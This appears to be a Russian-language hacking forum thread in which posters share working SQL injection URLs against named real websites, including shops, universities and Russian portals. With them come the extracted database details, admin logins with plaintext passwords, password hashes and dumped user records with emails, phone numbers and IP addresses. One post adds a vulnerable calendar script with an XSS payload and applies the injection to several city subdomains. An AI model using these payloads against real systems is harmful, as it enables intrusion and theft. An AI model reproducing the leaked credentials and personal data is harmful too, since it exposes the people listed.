http://www.gotennis.ru Code: http://www.gotennis.ru/players/index.php?id=-9999+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database%20(),%20user()),8,9,10,11,12,13,14,15,16,17,18/* 5.0.37-standard-log:gotennis:gotennis_gotenni@localhost
http://imhc.ie/newsRoom/newsRoomItem.php?id=-1+union +select+1,concat_w s(0x3a,version(),database(),user()),3,4,5,6-- 5.0.45-community-log:imhc200_mainSite:[email protected] PR: 5
Единая сеть Рунэтчиков http://rocid.ru база с аккаунтами http://rocid.ru cлита благодоря уязвимости на одном из проектов rocid.ru _http://2008.rif.ru/system/remote/get.program.reports.php?id=-739+union+select+concat_ws(0x3a,rocid,password),2+from+user%23 часть Code: 3124:0c4c2281b3d37cb1ae53d636ca75fe35 2 РИФ-2008 3125:5f1196a1ec20750f694605aae950ee7e 2 РИФ-2008 3126:1fda1172d35cf7345a8417bead5fc19a 2 РИФ-2008 3127: 2 РИФ-2008 3128:ae47369a1ae1714f64c67edc923c87fa 2 РИФ-2008 3129:09f53cc7e908d01d60e53d2bd470f984 2 РИФ-2008 3130:2a11aaa37e4220dbebbf8645b46996c3 2 РИФ-2008 3131:475cf107d121df30b62ef1e8e4c35e19 2 РИФ-2008 3132: 2 РИФ-2008 3133:12e2250866eb9261bf6b6c3ef0616d43 2 РИФ-2008 3134: 2 РИФ-2008 3135:34b2e8df62881ec0f4cd547ae10d787b 2 РИФ-2008 3136:716ff43d911d8fb6bf074d1b951a2689 2 РИФ-2008 3137: 2 РИФ-2008 3138:fd88810ebaabfafa345a2dc264697b29 2 РИФ-2008 3139: 2 РИФ-2008 3140:4691480bb2c98437b6636f2e3695d976 2 РИФ-2008 3141:7decf0f7198de7eb3aaba586fba2e1c2 2 РИФ-2008 3142:67b7ccc80269d02cedd51ba304af8d09 2 РИФ-2008 3143: 2 РИФ-2008 3144:9a70e1a81f6e55a57ab451e7d999bcab 2 РИФ-2008 16373:cd50b4634dee7c29031904e8284e9cdb 2 РИФ-2008 3149:717a75de484ce35a2b8aa79d333cc9d2 2 РИФ-2008 3150:801788e40d69cdeeedcdba6605f21e2d 2 РИФ-2008 3151:922350fbbccc3bda1669733ed490ac58 2 РИФ-2008 3152:634433929375939e4b60442ec139847e 2 РИФ-2008 3153:c4d26b0dca751e00ea171d33b2c40325 2 РИФ-2008 3154:01efbcbef25f550f6e08cf5c465f3f0d 2 РИФ-2008 3155: 2 РИФ-2008 3156: 2 РИФ-2008 3157: 2 РИФ-2008 3158:7a728f0dc76d78c92de4116e76cbc04c 2 РИФ-2008 3159: 2 РИФ-2008 3161:5b54cee8c1e0e6df7556475ecec5b5b0 2 РИФ-2008 3164:1e0638ce5fd70fa8cd5bbb210c3ec3a3 2 РИФ-2008 15962:afaee984acb2676f6e7d753896d4d895 2 РИФ-2008 3167:c600b74d29b634c7ce1f2f4df8ca19f4 2 РИФ-2008 3168:91cddd6f4f4cc0b52446c9aa6397eb01 2 РИФ-2008 3169:ffb037b37caff76113f80881f4163454 2 РИФ-2008 3171: 2 РИФ-2008 3172:6cd8c0b549625c0f19be373db679c078 2 РИФ-2008 3173: 2 РИФ-2008 3174:1ac91903ec12b53949c33e322457696d 2 РИФ-2008 3175: 2 РИФ-2008 16400:af56c0019d77277251a658c9a1cbfa16 2 РИФ-2008 3178:c65486a65c2800c39620763673073339 2 РИФ-2008 3179:f3d0584c7039dde1843450a4bdf5bd4f 2 РИФ-2008 3180:1302dd9e9288382c09c914348e271dad 2 РИФ-2008 3181:0fd676b4165a0de5d583bd05732349dd 2 РИФ-2008 3182:4c1e4f015ba9b8bec237dc1ca705466d 2 РИФ-2008 3183: 2 РИФ-2008 3184: 2 РИФ-2008 3185:7bfe2a5ea387756d1c6a2bf758694bf9 2 РИФ-2008 3186:9e59f430475fa6bc79f994df0ef19522 2 РИФ-2008 3187:0d2df42c035414da2117819ce94eaf79 2 РИФ-2008 3188: 2 РИФ-2008 3190:3416e6cf3ed1f8fc41dc32c211b5c2a0 2 РИФ-2008 3191: 2 РИФ-2008 3192:8462a8056f34c5a7e9e4305199a60b05 2 РИФ-2008 3193: 2 РИФ-2008 3194:adda34cab5d7c68e5ce14550e35d43f6 2 РИФ-2008 3195:2febd2b2158fead9dea486293f86c7a0 2 РИФ-2008 3196:4f78546437f543381f6e7d86437a0567 2 РИФ-2008 3197:c1145a13a40fd7dcbd799dcc34ae353b 2 РИФ-2008 3198:97bacfa46436740e80d525b1b96828c2 2 РИФ-2008 3199:ac82abe05555d1a069e0f88b84782dc1 2 РИФ-2008 3201:e326da29dbc1985096cf9fbde220455a 2 РИФ-2008 3202:1229220bd86c083c6b20e733876bf66d 2 РИФ-2008 3203:4f76adce601de9b0c86c15f06cd03ac9 2 РИФ-2008 3204:68df453c237e187af5ce194d1f387bfb 2 РИФ-2008 3205: 2 РИФ-2008 3206:896a4a8c1ae7f6c8ad4b84c60451ee6b 2 РИФ-2008 3207: 2 РИФ-2008 3208:e7e4dd126ab44999791c111158c2316d 2 РИФ-2008 17884:4db8bfe236eb3ae765b039517ec4f2a2 2 РИФ-2008 3210: 2 РИФ-2008 3212:31b62a5d13d3afc075daef4e682711ad 2 РИФ-2008 3214: 2 РИФ-2008 3215:1ffedadae4957c16df568ce5ba1ae3df 2 РИФ-2008 3216:af017e24b54b9631628936d2ed8b682d 2 РИФ-2008 3217: 2 РИФ-2008 3218: 2 РИФ-2008 3219: 2 РИФ-2008 3220:3d7278064efd026546268220bb052cba 2 РИФ-2008 3221:7ea4f15a6736cd7c39a4c895ee0b3a07 2 РИФ-2008 3222: 2 РИФ-2008 3223: 2 РИФ-2008 3224:94cdf4e58760134e83290ec66c6024f0 2 РИФ-2008 3226:f68502235c02e55aea5d800afc01b9ca 2 РИФ-2008 3227: 2 РИФ-2008 3229:30a421658a945a378d8f7f4eae62bb93 2 РИФ-2008 3230: 2 РИФ-2008 3231: 2 РИФ-2008 18015:6321776a2c2ae171761655cf0329fee1 2 РИФ-2008 3233: 2 РИФ-2008 3234: 2 РИФ-2008 3235: 2 РИФ-2008 3236:1333cbbaed8c4707146735242bca3901 2 РИФ-2008 3237: 2 РИФ-2008 3238:bebf82be67f689f4662373746fbed1eb 2 РИФ-2008 3239: 2 РИФ-2008 3241:87df550c0b3b59f0e353279593baeebb 2 РИФ-2008 3242:75a0510d0c4cd2b10e9df1fae15e039b 2 РИФ-2008 3243:61c49fce8be161fb6d0fb196745fedab 2 РИФ-2008 17829:e745a6bad4ffe5a1b35aac134ea148c7 2 РИФ-2008 3245: 2 РИФ-2008 3246:423ca618e3aef6d320b10ec971dd97c2 2 РИФ-2008 3248:6dd871c1f30b9b870e9809d8046ace4f 2 РИФ-2008 3249: 2 РИФ-2008 3251:69f5719cf7bab7ca7490e3caa9cbb5ca 2 РИФ-2008 3252: 2 РИФ-2008 3253:3905a2aa637c455897ae8e2e74927a88 2 РИФ-2008 3254:7eebd5fca04fe123c418d0afd9437e79 3255:5ac245b339a163668f6fcdf5fff2d7d2 2 РИФ-2008 3256:6c3dac64e06b0996ce7cc9a20630f1ac 3260:32966204931ddae303a8b3826a017df9 3261:c76d8cd13766943816b40c0315467db8 3267:4f8fd4afe6534d691d2fd1971a547e30 3268:fe107478bcd2328540d3dbf5925e2587 3271:16dc701af136418f6502c16370d16fb7 3272:84de7a77c9118b47d46d33cbc8b236ef 3275:785b74364fe5b6de1dff574add7f53b6 3276:b306afc72e73da89cc0f770bbfffbea7 3277:3be60c9d035488a6c736ae6213c5e717 3278:65fdae00e07c01b7859e3bd42afc3456 3281:0e46c5fb6656147c33627ba75444e0c0 3282:f813d697e75e5f971cd3a66095441934 3283:a1818fcfb1161945b174c754b6bab725 3284:86c1a86bbb3b180f795d5674bf76f9e5 3286:adf95a0e9a8c9e65b93b60c062b4fdbc 3289:cca52de0433bf19373eb6731b03bba2f 3290:89541e79bc92bcd6d257630a2a804181 3291:7ebb0e58a319a47a3f791cbf34b4d443 3293:3e8ea9c2f373f6dfd09a50ad6bcf8cfa 3294:6d65e2cdbe4b0f7a9710a055c9531a29 3295:0a4e374d00643e9f48ed083a3fc9d232 3297:da91d50559e88a9e3c299cb56de0a25b 3298:726581b959d6a70f2c46c1f8401ca117 3299:e9296a0ccbd3374203227afd8fe5b469 3301:b3f2c5c4ec13722ffe492be1b1cf2adf 3303:fe8140fa01967942728e23ba8b2e8c0a 3305:5ce7023862e647b3c4d428c539b9b4b3 3306:5bb62948014c4be7f77fe27a1a06b63f 3307:1115b255a1387d52baa95f925ee42dd3 3308:9d625a5c030fe550041a6ab57ecdb802 16151:134929f01ee91213e508b23e6ec11623 3310:83793af93325ea2b9f662653eaebb8d8 3313:a58e13270371e5279b0b08ddfb401240 3314:395d6572bc9e7d0d0b957217d74101d9 16362:19824e040e453f7d4eaad993583366bf 3320:d9a872527e451dc724c70faca9108ee9 3321:59ece891e1b690d4a3488fd49dcc8fc0 2163:34b754be5c7bd7d3ad64776d79c49efe 3322:1880ea23e29feae165143df01f2c0beb 3323:3b1250f6796f41e83764b1972b3e8519 3324:0fee4df4d1cd8e1815fedd7ab53f49dc 3325:454d6c31030e7495e2d35f5ee216d208 3326:0a53f8afb9f782281821f7aceae238b6 3327:8b17ab270e41abf61a56ec7a978bb6ad 17997:85e5bde86b3898d2001f327c3b8bf05e 2349:fe532bc9dfd00df95e4d58183b9314d0 2210:3f80f2ef3f496013232e65d5f78f1c5c порядка 40% паролей чиловые.
http://www.armchair.ie/tell_friend.php?id=-1+union+select+1,2,concat_ws(0x3a,ve rsion(),data base(),u ser()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 5.0.51a-3ubuntu5.4-log:armchair:armchair@localhost PR: 2
Xss&Sql-inj в скрипте календаря Xss&Sql-inj в скрипте календаря. 2)характерная черта линк вида /news/?_Year=2009&_Month=4&_Day=10 3)news/?_Year=2009&_Month=4'&_Day=10 sql-inj 4)news/?_Year=2009&_Month=4</script><script>alert(/xss/)</script>&_Day=10 cам уязвимый скрипт Code: <? global $DOCUMENT_ROOT; $DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT']; include "$DOCUMENT_ROOT/manage/inc/all.php"; if (!((isset($_Year)) && (isset($_Month)) && (isset($_Day)) && (isset($id)))) print 'Ошибка календаря'; else { $id = content_get_initial($id); $iface = content_lookup_id($id); $Months = array ("","is_January", "is_February", "is_March", "is_April", "is_May", "is_June", "is_July", "is_August", "is_September", "is_October", "is_November", "is_December"); $DoDays = array (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31); $LDoDays = array (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31); $p_m = $iface->GetPredYM($_Month,$_Year); $p_m = explode('_',$p_m); $n_m = $iface->GetNextYM($_Month,$_Year); $n_m = explode('_',$n_m); $prev_Month = mktime (0,0,0,$p_m[0], 1, $p_m[1]); $next_Month = mktime (0,0,0,$n_m[0], 1, $n_m[1]); //$prev_Month = mktime (0,0,0,$_Month-1, 1, $_Year); //$next_Month = mktime (0,0,0,$_Month+1, 1, $_Year); $MaxDay = date("t",mktime (0,0,0,$_Month, 1, $_Year)); $prev_MaxDay = date("t",$prev_Month); $next_MaxDay = date("t",$next_Month); $firstYM = explode('-', $iface->GetFirstYM()); $lastYM = explode('-', $iface->GetLastYM()); ?> <div id="months"><?if (!(($_Month==$firstYM[1]) && ($_Year==$firstYM[0]))) {?><a href="#" class="prev" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$prev_Month)?>&_Month='+parseInt(<?=date("m",$prev_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/larr.gif" alt="<-" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?};?><?=$Months[$_Month]." ".$_Year?><?if (!(($_Month==$lastYM[1]) && ($_Year==$lastYM[0]))) {?><a href="#" class="next" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$next_Month)?>&_Month='+parseInt(<?=date("m",$next_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/rarr.gif" alt="->" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?}?></div> <table> <tr> <th>is_PN</th> <th>is_VT</th> <th>is_SR</th> <th>is_CT</th> <th>is_PT</th> <th>is_SB</th> <th>is_VS</th> </tr> <? print '<tr>'; $weekdayfirst = date("w",mktime (0,0,0,$_Month, 1, $_Year)); if ($weekdayfirst=='0') $weekdayfirst = 7; $dayweek = $weekdayfirst-1; $firstdate = $prev_MaxDay - $weekdayfirst+2; for ($j=$firstdate;$j<=$prev_MaxDay;$j++) print '<td class="empty">'.$j.'</td>'; for ($i=1;$i<=$MaxDay;$i++) { $dayweek=$dayweek+1; if (($dayweek%7==1) && ($dayweek!=$weekdayfirst)) print '</tr> <tr>'; if (($i==date("d")) && ($_Month==date("m")) && ($_Year==date("Y"))) { if (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day))) print '<td class="current"><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>'; else print '<td class="current">'.$i.'</td>'; } elseif (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day))) print '<td><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>'; else print '<td>'.$i.'</td>'; } $j=0; while ($dayweek%7>=1) { $dayweek=$dayweek+1; $j=$j+1; print '<td class="empty">'.$j.'</td>'; } print '</tr>'; ?> </table> <? } ?> Code: izhevsk.citysvyaz.ru http://izhevsk.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=8 http://izhevsk.citysvyaz.ru/info.php root@localhost 5.0.45-community-nt-log http://izhevsk.citysvyaz.ru/in2.php samara.citysvyaz.ru http://samara.citysvyaz.ru/info.php http://samara.citysvyaz.ru/news/?_Year=2009&_Month=2+union+select+1,2,user(),version(),5--&_Day=5 gorsvyaz@localhost 5.0.45-community-nt-log omsk.citysvyaz.ru/ http://omsk.citysvyaz.ru/info.php http://omsk.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=17 root@localhost 5.0.45-community-nt-log nsk.citysvyaz.ru/ http://nsk.citysvyaz.ru/news/?_Year=2009&_Month=3+union+select+1,2,user(),version(),5--&_Day=11 [email protected] 5.0.32-Debian_7etch8-log tmn.citysvyaz.ru/ http://tmn.citysvyaz.ru/info.php http://tmn.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=6 root@localhost 5.0.45-community-nt chel.citysvyaz.ru/ http://chel.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=5 root@localhost 5.1.19-beta-community-nt-debug nch.citysvyaz.ru http://nch.citysvyaz.ru/news/?_Year=2007&_Month=9+union+select+1,2,user(),version(),5--&_Day=26 root@localhost 5.0.45-community-nt http://iskra.lysva.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),4,5,6,7%20--%20&_Day=11&PHPSESSID=e06ad578342540fd0f4e81c6d63caad3
http://www.uark.edu/ua/wxl02/report.php?trm=-99999+union+select+version(),2,3,4,5,6,7,8-- Database Version: 5.0.75-log -------------------------------------------------------------------- http://artdesign.calpoly.edu/alumni.php?year=-99999+union+select+1,2,3,4,5,6,7,8,9,concat_ws (0x3a,user,password),11,12+from+mysql.user-- root:wusthof -------------------------------------------------------------------- http://nkuconnections.nku.edu/detail.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('VwDictionary','dtproperties','sysconstraints','syssegments','TblAbout','tblBuildingCodes','tblCategory','TblCustom','TblCustomFields','tblEvents','tbleventshack','tbleventshack2','TblLog','tblPartI','tblPartII','tblPartIII','tblPartIV','tblPhotos','tblSchedules','tblSecurity','vwevents','vwListEvents'))
халява ТВ (думаю поглумиться с update) http://www.freetv.fr/tv.php?id=1+union+select+1,2,concat_ws(0x3a,ve rsion(),datab ase(),us er()),4,5,6,7,8,9,10,11,12-- 5.0.68-log:freetvsql:[email protected] PR: 2
еще пару шопов... ec.kyict.com.tw Code: http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/* admin:hi7410 Таблицы: Code: [code]http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_name,8%20from%20information_schema.tables/* [/code] Кусок дампа таблицы с юзверями: Code: INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('1', '[email protected]', 'pansy_lai', 'e9f81a5f8c038fe7f5e579024e1ab60e', '', '', '2', '1908-01-01', '0.00', '0.00', '0', '0', '0', '1200871393', '0', '0000-00-00 00:00:00', '', '0', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00'); INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('2', '[email protected]', 'chiaho', '8ed35021606371c208f2d056c14e020e', '', '', '1', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1146035280', '1200980182', '0000-00-00 00:00:00', '218.210.238.232', '3', '0', '0', '0', '0', '0', '', '', '', '', '', '', '1', '0.00'); INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('3', '[email protected]', 'ritakao', '5724cf1a6a973cc01c7cc3890eb04dd5', '', '', '1', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1167017276', '1200965885', '0000-00-00 00:00:00', '218.210.238.232', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00'); INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('4', '[email protected]', 'shane', 'c7c5399b49dd043c96ed0c0258607e87', '', '', '1', '1989-05-07', '0.00', '0.00', '0', '0', '0', '1200995153', '1200966388', '0000-00-00 00:00:00', '218.210.238.232', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00'); INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('5', '[email protected]', 'suzy', 'fe7cb68d197e9c938caa810d001b76f7', '', '', '2', '1983-05-05', '0.00', '0.00', '0', '0', '0', '1200996685', '1200968007', '0000-00-00 00:00:00', '60.249.120.190', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '1', '0.00'); INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('6', '[email protected]', 'kevin', 'dfdddbbe9c4aebc35385c67b1ed01a0f', '', '', '1', '1970-09-07', '0.00', '0.00', '2500', '2500', '1', '1152815400', '1201122884', '0000-00-00 00:00:00', '60.249.120.182', '2', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00'); INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('7', '[email protected]', 'larrylin', 'b96ad5bb2173587d1c6b35ef4977b82e', '', '', '0', '0000-00-00', '0.00', '0.00', '1', '1', '2', '1201162547', '1201230188', '0000-00-00 00:00:00', '59.126.210.220', '2', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00'); INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('8', '[email protected]', 'swaya57', '37ffbcbb89a0f03a3e0867341eee9b53', '', '', '0', '0000-00-00', '0.00', '0.00', '1', '1', '0', '1240790468', '1240790468', '0000-00-00 00:00:00', '163.24.24.117', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00'); АдминкЭ: Code: http://ec.kyict.com.tw/admin/index.php Логин:admin Пасс:hi7410 ОС: WINDOWS PR:0 www.mjholly.com Code: http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_name,8%20from%20information_schema.tables/* config.php Code: <?php // database host $db_host = "localhost:3306"; // database name $db_name = "vhost15459-1"; // database username $db_user = "vhost15459"; // database password $db_pass = "phoebe"; // table prefix $prefix = "ecs_"; $timezone = "Asia/Shanghai"; $cookie_path = "/"; $cookie_domain = ""; $admin_dir = "admin"; $session = "1440"; ?> Админ Code: http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/* mok579:a4836cd6d94d73eac97cdff2c47aab5f:[email protected] Юзвери: Code: http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c),8%20from%20ecs_users/* Кусок дампа из таблицы юзверей: Code: INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('26', '[email protected]', 's2224913', 'dc7f1d68d86fd5b29b97b342bd91a0ae', '', '', '0', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1235846895', '1235846895', '0000-00-00 00:00:00', '58.114.130.16', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00'); INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('27', '[email protected]', 's726162001', 'cec6ddc2b766c26fd4a9bffd55f45dc7', '', '', '0', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1237181260', '1237181260', '0000-00-00 00:00:00', '218.175.56.242', '1', '0', '0', '0', '0', '0', '', '[email protected]', '', '', '', '0939356129', '0', '0.00'); INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('28', '[email protected]', '蔡沛錞', 'c6158b366eb168d81117331a3c88ab8b', '', '', '0', '0000-00-00', '0.00', '0.00', '0', '0', '10', '1237581695', '1237581695', '0000-00-00 00:00:00', '114.32.139.143', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '0987239628', '0', '0.00'); PR:2
Armand Group Code: u30316_cadillac:[email protected]:5.0.51-log Code: u30316_chevrolet:[email protected]:5.0.51-log Code: u30316_hummer:[email protected]:5.0.51-log Code: u30316_opel:[email protected]:5.0.51-log Code: Mitridat:8fa28933e324369750ae85d026ba0b8c:[email protected] FRM:d47748d5f5aa908c631dcecedfcef3af:[email protected] freemind:237d87b028023a3840331ae2cba2a7fb:[email protected] Екатерина:820ef0cc6e148bbec7f9631338e84ee4:[email protected] tabak72:96f74539d3b453aba888f1f01224509f:[email protected] ulceple:9b0335d4d6ec5b8f046ebf34b128b022:[email protected] Code: 13ca4314d25cb955c1228a4393b77c54:admin
http://www.otoplenie.eu/php/firm_profiles.html?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,data base(),user(),ver sion()),8,9,10,11,12,13,14,15,16,17,18,19,20,21-- otopleni_otoplenietopleni_otoplen@localhost:5.0.67-community ------------------------------------------------------------------------ http://travelexpresbg.com/page.php?id=-1+union+select+1,concat_ws(0x3a,dat abase(),u ser(),versi on())-- travelex_te:travelex_te@localhost:5.0.67-community-log
Продолжаем тему шоп- Code: http://www.vostart.com/web/eng/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*
[PR 4] Code: http://www.wedasoft.at/en/product.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 4.1.15-Debian_0.dotdeb.4-log:wedasoft:wedas@localhost [PR 3] Code: http://zonadostupa.ru/product.php?id=5814+union+select+concat_ws(0x3a,version(),database(),user()) 4.1.22-log:wwwzonadostuparu:[email protected]
http://www.arcadi.fr/rendezvous/rv.php?id=-1'+union+select+1,2,concat_ws(0x3a,database(),use r(),versio n()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* arcadi_web2:[email protected]:5.0.33-log PR: 6
Target: www.racingimages.cc Evil link: http://www.racingimages.cc/news.php?id=-119'+union+select+1,2,3,4,5,6,7/* Database info: user: racingimages@localhost database: racingimages version: 4.1.22-standard Users (http://www.racingimages.cc/news.php?id=-119'+union+select+1,2,3,4,concat_ws(0x3a,login,password),6,7+from+user/*) vmt:$1$lNZVfFdL$10UMAm9L.FzCOax66mCJq/ lauri:$1$bNYsaYKl$BQPISnslvc2/5rC1G.XrO0 matti:$1$kMifYQzs$.JSbo5Wzyl2gfpJ79HF7J/ Админку не нашёл
Хип-Хоп портал www.hiphopbase.ru Code: http://hiphopbase.ru/HipHopBase.php?site_page=111&id=-663+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11-- hiphopb4@localhost:4.1.22-log:hiphopb4_hhbasedb PR:1 ТиЦ:10
http://www.taxi-control.ru/index.php?id=-1+union+select+1,concat_ws(0x3a,database(),use r(),versio n()),3-- taxicontrol:[email protected]:4.0.27-log
http://www.sportstarmanagement.com PR 5 Code: http://www.sportstarmanagement.com/News.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/* 4.1.22-standard:sportsta_sportstardb:sportsta_sportst@localhost
Code: http://www.lordsofmetal.nl/crew.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19 mblofmetal_lom@localhost:mblofmetal_lom:5.0.51a-community-log Code: http://www.bulfurniture.com/php/products.html?id=1 Blind Юзер: bulfurniture@localhost БД: bulfurniture Версия: 4.0.24_Debian-10sarge3-log Чтобы достать юзера, бд и версию, понадобилось 90 мб траффика.
so little shops {print in title} 4.0.27-log:[email protected]:hunt-shop Adminassword 5.1.24-rc:sporttiming@localhost:sporttiming 5.0.37-community:toddycafe@localhost:toddycafe 5.0.67-log:[email protected]:virt1393 {print in source} 5.0.45:santa_su@localhost:db_santa_su
